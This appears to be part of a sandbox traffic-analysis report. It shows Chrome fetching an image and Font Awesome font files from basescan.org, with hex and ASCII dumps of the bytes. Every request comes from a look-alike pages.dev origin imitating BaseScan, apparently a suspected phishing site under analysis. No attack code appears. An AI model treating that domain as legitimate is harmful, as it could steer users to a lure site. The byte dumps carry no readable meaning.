                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC589INData Raw: 52 49 46 46 14 04 00 00 57 45 42 50 56 50 38 20 08 04 00 00 30 3c 00 9d 01 2a 90 01 90 01 3e 49 24 90 45 a2 a2 21 92 a4 00 28 04 84 b4 b7 71 a3 42 57 17 c7 7e 3e 6b f9 2f b0 9f eb 95 cd ff 6e ce 11 fd f3 f2 03 2c eb b4 59 6b 33 ae f4 87 fd cf ed de cb 5f f1 ba fc 7e c7 7b 28 7e 80 06 68 01 ea 96 5e ec 43 a9 39 3b a2 1d 49 c9 dd 10 ea 4e 4e e8 87 52 72 77 44 3a 93 93 ba 21 d4 9c 9d d1 0e a4 e4 ee 88 75 27 27 74 43 a9 39 3b 9d 00 78 c1 58 30 60 26 a5 b8 8e 9f 34 a4 05 4a 94 49 89 45 3f 2d 53 ba 1c 1a 6e a3 b6 0c 94 f3 93 8a f0 8a 81 3c a6 04 47 55 5c 2f 76 21 6f 3a f8 06 a2 1c cc 4d 0e 0a 04 fa f0 03 d1 5e 57 2a 97 70 ce 0e 01 ce cf d9 43 a9 39 18 23 15 a7 d0 75 b5 9c ed 98 89 74 54 ee 86 e1 04 8a 41 64 1b 5c 18 30 32 a0 ad 69 01 9b eb c5 8a 0b 70 9b ca 0e
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 0<*>I$E!(qBW~>k/n,Yk3_~{(~h^C9;INNRrwD:!u''tC9;xX0`&4JIE?-Sn<GU\/v!o:M^W*pC9#utTAd\02ip
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC463INData Raw: 0d 13 31 10 aa b8 c4 90 f9 ab 4a 2a d5 3f fd eb 7b 3d e8 a3 2a 9c bb 7f ef ee d0 c6 c1 f9 e4 62 d8 7e ea 02 ed 50 00 05 f3 e2 24 69 3d 11 05 7f 44 ca d5 e9 30 ab c3 ee 3b 92 ff fc 20 0e 17 4f cb 8d 12 02 ec 03 7a 0c 9a 25 f6 02 ff 17 ee 64 56 97 d9 52 4e 19 84 7b 49 62 6c 7f dd fe 09 72 ea ab f6 43 69 1d f1 b5 a2 3b fc 03 3f 81 be b7 ee b0 30 ed 4c 7e 50 9f 54 2c 36 52 d4 16 c6 d9 12 ba 3f 2c 45 84 2f dc eb c6 3c e1 04 fc 29 26 9d 84 e8 05 27 cf f3 32 7e c8 1f e9 af 96 2d 9f fb c4 a3 18 15 12 e9 70 96 37 36 d6 b8 ec 8a fa bb bd 8e cb e4 af f3 e4 68 4b ed 3e 04 70 00 00 83 e4 4c d5 37 92 da ed fa f3 4c 2d 37 9f f0 20 af 98 b9 fb 93 4a a5 6e 16 df 7e 34 52 d6 db bf dc 23 80 e5 27 6f 8d 50 86 10 32 68 1d 72 2c 18 b6 bf 7f dc 01 e0 1d 4e 79 88 5c ff bf de 92
                                                                                                                                                                                                                                              Data Ascii: 1J*?{=*b~P$i=D0; Oz%dVRN{IblrCi;?0L~PT,6R?,E/<)&'2~-p76hK>pL7L-7 Jn~4R#'oP2hr,Ny\


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              118192.168.2.549866104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC705OUTGET /assets/vendor/font-awesome/webfonts/fa-solid-900.ttf HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 986648
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59658
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bn72yHmD1Zr1pJwpLrKahA0MNHKhcS9Uyzp4n%2BDOxBQgJ3qjChdRngR6uFFOOmMr3wQ7buW3Sq14Fjy%2FLF%2FqRZW1CPFRN3wld5ZUmEafYqXmRa%2Btt61Fy5i%2FeFJjVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e49ef241c1-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC553INData Raw: 00 01 00 00 00 0a 00 80 00 03 00 20 4f 53 2f 32 61 6f 62 59 00 00 01 28 00 00 00 60 63 6d 61 70 c7 60 2e f3 00 00 34 d0 00 00 48 78 67 6c 79 66 12 76 52 f1 00 00 b0 94 00 0d 9a 90 68 65 61 64 27 bb 19 94 00 00 00 ac 00 00 00 36 68 68 65 61 04 4b 0e fb 00 00 00 e4 00 00 00 24 68 6d 74 78 21 67 21 bc 00 00 01 88 00 00 33 48 6c 6f 63 61 56 30 c5 58 00 00 7d 48 00 00 33 4c 6d 61 78 70 0c ed 06 d0 00 00 01 08 00 00 00 20 6e 61 6d 65 4f 08 f3 5f 00 0e 4b 24 00 00 03 e1 70 6f 73 74 2e 55 46 bb 00 0e 4f 08 00 00 bf 0e 00 01 00 00 03 05 03 00 d3 0d 34 12 5f 0f 3c f5 00 0b 02 00 00 00 00 00 e1 8d 6b 0b 00 00 00 00 e1 8d 6b 0b ff f2 ff b5 02 8b 01 cb 00 00 00 08 00 02 00 01 00 00 00 00 00 01 00 00 01 cb ff b5 00 00 02 80 ff f2 ff f3 02 8b 00 01 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: OS/2aobY(`cmap`.4HxglyfvRhead'6hheaK$hmtx!g!3HlocaV0X}H3Lmaxp nameO_K$post.UFO4_<kk
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 80 00 00 01 40 00 00 01 40 00 00 01 40 00 00 01 40 00 20 01 c0 00 00 01 80 00 00 01 c0 00 00 01 40 00 00 01 c0 00 00 01 40 00 00 01 40 ff fc 01 80 00 00 01 80 00 00 01 80 ff fe 02 40 ff fe 01 80 ff ff 01 80 ff fe 01 80 ff fb 00 c0 00 00 01 40 ff fe 00 c0 00 20 00 c0 00 20 01 00 00 00 00 40 00 00 01 00 00 20 01 c0 00 00 02 80 00 00 02 80 00 1f 02 00 00 00 02 00 00 00 01 c0 00 10 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 80 00 00 01 c0 00 00 02 40 00 00 02 80 00 00 02 80 ff fb 02 80 00 00 02 80 ff fb 02 40 00 00 02 00 00 00 02 80 00 7c 02 00 00 01 01 80 00 00 01 80 00 00 01 80 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 00 ff f8 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 80 00 00 02 00 ff fd 01 c0 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@ @@@@@ @ @@|@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 00 01 80 00 00 01 80 00 10 01 80 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 80 00 20 02 00 ff f9 02 00 ff f9 02 00 00 00 01 80 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 02 80 ff f9 02 40 00 00 02 40 ff fa 02 00 ff fa 02 80 ff f9 02 80 ff fa 01 80 00 10 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 00 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 40 00 00 02 40 00 00 01 80 ff ff 01 80 ff ff 01 c0 00 00 02 40 00 00 01 c0 00 00 02 00 00 20 02 00 00 20 01 c0 00 00 01 c0 00 00 01 80 00 00 02 40 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@@@@@ @@@@@@@@ @
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 02 80 00 00 01 80 00 00 01 80 ff fe 02 00 00 01 01 80 00 10 01 80 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 40 00 00 01 80 00 00 01 80 00 00 02 00 00 00 01 c0 00 00 02 80 00 00 01 80 00 00 02 00 ff fe 02 80 00 00 02 00 00 00 02 00 00 00 01 80 00 00 02 80 00 00 02 40 00 00 01 80 ff ff 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 10 02 00 ff f9 02 00 ff fe 02 80 ff f9 02 00 00 00 02 00 00 00 02 00 00 14 02 00 00 08 02 00 00 14 02 00 00 00 02 40 ff fb 02 00 00 00 01 c0 00 00 01 c0 00 00 02 00 ff fb 02 00 00 00 02 00 ff f9 02 80 00 00 02 80 00 00 01 c0 00 00 02 80 00 00 02 80 00 00 02 00 00 00 02 00 ff fc 02 00 00 00 01 80
                                                                                                                                                                                                                                              Data Ascii: @@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 02 80 00 00 02 40 00 03 01 80 00 00 01 00 ff fe 02 00 00 00 02 00 00 00 02 00 00 0c 01 80 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 00 ff fb 01 40 ff fe 01 c0 00 00 02 40 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 80 ff f9 02 80 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 80 00 60 02 00 00 20 02 00 00 00 02 00 ff fc 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 80 00 18 02 00 00 00 02 80 00 00 02 80 ff
                                                                                                                                                                                                                                              Data Ascii: @@@@@` @@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 40 00 00 01 c0 00 00 01 40 ff fe 02 80 00 00 02 00 00 00 02 80 00 00 02 00 00 00 01 80 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 80 00 0c 02 00 00 00 01 c0 ff f9 02 40 ff fe 02 40 ff fe 02 00 00 00 02 00 00 00 02 80 00 20 01 40 00 10 02 40 00 00 02 80 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 80 ff fe 02 80 00 00 02 00 ff fe 02 00 00 00 02 00 ff f9 02 80 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 40 ff f9 01 c0 00 00 02 00 00 00 02 40 ff ff 02 40 ff ff 01 c0 ff f7 02 00 00 20 02 00 00 20 01 c0 ff fa 01 c0 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 40 00 00 02 80 00 00 02 80 00 00 02 80 00 00 02 00 00 0c 02 00 00 00 02 00 00 00 02 00 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@@ @@@@@@@ @
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 02 00 00 00 02 80 00 00 02 00 00 20 01 c0 00 00 01 c0 00 00 02 00 00 20 02 00 00 40 01 c0 00 20 01 c0 00 20 01 40 00 20 01 40 00 40 01 c0 00 20 01 c0 00 20 02 80 00 00 01 c0 00 00 01 80 00 10 01 c0 00 00 01 c0 00 00 02 00 ff fa 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 01 c0 00 00 02 40 00 00 02 80 00 00 02 40 00 13 01 c0 00 0d 02 00 00 00 01 c0 00 00 02 80 ff f9 00 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 27 02 00 00 00 01 80 00 10 02 80 ff f9 02 00 00 0f 01 c0 00 00 02 00 ff fb 02 00 ff fd 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 ff f9 01 c0 00 00 02 00 00 00 01 c0 00 08 00 80 00 00 01 c0 00 00 02 00 00 00 02 40 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @ @ @@ @@@@'@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 80 ff fb 01 c0 00 00 01 c0 00 00 01 80 ff fb 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 ff fe 02 00 00 00 02 00 ff fe 02 40 00 00 02 40 00 00 02 80 ff f9 02 00 00 00 02 80 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 18 00 c0 00 0e 02 00 00 00 02 00 ff fb 02 40 00 20 01 80 00 00 01 80 00 00 02 40 00 00 02 40 00 00 01 80 00 00 01 80 00 10 01 80 00 10 01 80 00 10 01 80 00 10 02 40 00 00 02 80 ff f9 02 40 00 00 01 80 00 00 02 00 00 00 02 00 00 0f 01 c0
                                                                                                                                                                                                                                              Data Ascii: @@@@@@ @@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 00 09 01 80 00 00 01 80 00 00 02 40 00 00 02 00 00 00 01 80 00 00 01 80 00 00 01 80 00 00 02 40 00 00 01 80 00 00 02 00 00 02 02 40 00 02 02 00 00 00 02 40 ff fa 02 00 00 00 02 00 00 00 02 00 ff fb 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 ff f8 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 01 40 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 ff f7 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 00 ff fe 02 00 00 00 02 00 00 00 02 00 00 00 01 80 00 00 02 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 ff ff 02 40 ff fe 02 40 ff fe 02 80 ff fd 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 ff f9 02 80 00 00 02 00 00 00 01 c0 00 20 01 80 00 00 01 c0 00 10 01 c0 00 10 01 80 00 00 02 40 00 00 01 80 00 00 02 40 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 80 00 05 02 80 ff fb 01 c0 ff fd 02 40 ff fb 02 40 00 00 02 40 00 00 01 80 00 00 01 c0 00 00 02 80 00 00 02 40 ff ff 02 00 00 10 02 00 00 19 02 00 00 00 02 00 00 00 02 40 ff ff 02 40 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 80 00 00 02 80 00 00 01 c0 ff fa 02 00 00 00 02 40 00 00 02 40 ff fe 02 80 00 00 02 40 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 80 00 00 02 80 00 00 02 00 00 0f 02 00 00 00
                                                                                                                                                                                                                                              Data Ascii: @@ @@@@@@@@@@@@@@@@


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              119192.168.2.549868104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC705OUTGET /assets/vendor/font-awesome/webfonts/fa-light-300.ttf HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 1268624
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59658
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Kmk1sPeU1w4NUPacoTYfwVzuFfwXmdHyvB%2FnZ2ICXfvWph%2Ba%2BpsbEkO04Lt9RTRX5kf2yQsEa2uwPMQhMXCzw5rk2EWlq%2F0T35V2mPOLi0GrKXZbJkK2x%2F5PO0VEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e49f7b43bb-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC554INData Raw: 00 01 00 00 00 0a 00 80 00 03 00 20 4f 53 2f 32 5f 19 5d 5b 00 00 01 28 00 00 00 60 63 6d 61 70 c7 60 2e f3 00 00 34 d0 00 00 48 78 67 6c 79 66 18 49 93 b0 00 00 b0 94 00 11 e8 08 68 65 61 64 27 b6 19 8d 00 00 00 ac 00 00 00 36 68 68 65 61 04 47 0e f9 00 00 00 e4 00 00 00 24 68 6d 74 78 1e 3b 27 10 00 00 01 88 00 00 33 48 6c 6f 63 61 70 06 8d cc 00 00 7d 48 00 00 33 4c 6d 61 78 70 0d 06 08 58 00 00 01 08 00 00 00 20 6e 61 6d 65 11 48 8a 53 00 12 98 9c 00 00 03 e1 70 6f 73 74 2e 55 46 bb 00 12 9c 80 00 00 bf 0e 00 01 00 00 03 05 03 00 1a 13 07 b2 5f 0f 3c f5 00 0b 02 00 00 00 00 00 e1 8d 6b 07 00 00 00 00 e1 8d 6b 07 ff ef ff b5 02 89 01 cc 00 00 00 08 00 02 00 01 00 00 00 00 00 01 00 00 01 cc ff b5 00 00 02 80 ff ef ff f1 02 89 00 01 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: OS/2_][(`cmap`.4HxglyfIhead'6hheaG$hmtx;'3Hlocap}H3LmaxpX nameHSpost.UF_<kk
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 01 40 00 00 01 40 00 00 01 40 00 00 01 40 00 20 01 c0 00 00 01 80 00 00 01 c0 00 00 01 40 00 00 01 c0 00 00 01 40 00 00 01 40 ff fc 01 80 00 00 01 80 00 00 01 80 ff fd 02 40 ff fd 01 80 ff fb 01 80 ff fb 01 80 ff fe 00 c0 00 00 01 40 ff fc 00 c0 00 20 00 c0 00 20 01 00 00 00 00 40 00 10 01 00 00 20 01 c0 00 00 02 80 00 00 02 80 00 20 02 00 00 00 02 00 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 80 00 00 01 c0 00 00 02 40 ff fb 02 80 00 00 02 80 ff fb 02 80 00 00 02 80 ff fb 02 40 00 00 02 00 00 00 02 80 00 7c 02 00 00 01 01 80 00 00 01 80 00 00 01 80 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 00 ff fa 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 80 00 00 02 00 ff fe 01 c0 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @@@@ @@@@@ @ @@|@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 08 02 40 00 08 02 40 00 08 02 40 00 08 02 40 00 08 02 40 00 08 02 40 00 08 02 40 00 08 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 00 01 80 00 00 01 80 00 20 01 80 00 10 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 80 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 02 80 ff fb 02 40 00 00 02 40 00 00 02 00 00 00 02 80 ff fb 02 80 00 00 01 80 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 00 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 40 00 00 02 40 00 00 01 80 ff ff 01 80 ff ff 01 c0 00 00 02 40 00 00 01 c0 00 00 02 00 00 20 02 00 00 20 01 c0 00 00 01 c0 00 00 01 80 00 00 02 40 00 00 02 80
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@@@ @@@@@@@@@@ @
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 02 80 00 00 01 80 00 00 01 80 00 0e 02 00 00 01 01 80 00 20 01 80 00 10 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 40 00 20 01 80 00 00 01 80 00 00 02 00 ff fb 01 c0 00 00 02 80 ff fb 01 80 00 00 02 00 00 00 02 80 ff fb 02 00 00 00 02 00 ff fb 01 80 00 00 02 80 00 00 02 40 00 00 01 80 00 20 02 80 00 00 02 00 00 00 02 00 ff ff 02 00 ff ff 02 00 00 00 02 00 00 00 02 00 00 10 02 00 ff fb 02 00 ff fe 02 80 ff fb 02 00 00 00 02 00 00 00 02 00 00 14 02 00 00 08 02 00 00 14 02 00 00 00 02 40 00 01 02 00 00 00 01 c0 00 00 01 c0 00 00 02 00 ff fb 02 00 00 00 02 00 ff fb 02 80 00 00 02 80 00 00 01 c0 00 00 02 80 00 00 02 80 00 00 02 00 00 00 02 00 ff fc 02 00 00 00 01 80 00
                                                                                                                                                                                                                                              Data Ascii: @@@@ @ @
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 80 00 00 02 40 00 03 01 80 00 00 01 00 ff fe 02 00 00 00 02 00 00 00 02 00 00 0a 01 80 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 00 ff fb 01 40 ff fe 01 c0 00 00 02 40 00 10 02 00 00 00 02 00 00 00 01 c0 00 08 01 c0 00 08 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 80 ff fb 02 80 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 00 00 00 01 c0 00 00 02 00 00 20 02 00 00 00 02 00 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 00 00 00 02 80 00 00 02 80 ff fb
                                                                                                                                                                                                                                              Data Ascii: @@@@@ @@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 01 c0 00 00 01 40 00 00 02 80 ff fc 02 00 00 00 02 80 00 00 02 00 00 00 01 80 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 80 00 10 02 00 00 00 01 c0 ff fb 02 40 00 00 02 40 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 40 00 10 02 40 00 00 02 80 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 80 ff fe 02 80 00 00 02 00 ff fe 02 00 00 00 02 00 ff fb 02 80 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 c0 00 00 02 00 00 00 02 40 ff fc 02 40 ff fc 01 c0 ff f7 02 00 00 20 02 00 00 20 01 c0 ff fa 01 c0 00 00 02 00 00 00 02 80 00 20 02 80 00 00 02 40 00 00 02 80 00 00 02 80 00 00 02 80 00 00 02 00 00 10 02 00 00 00 02 00 00 00 02 00 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@@@@@ @
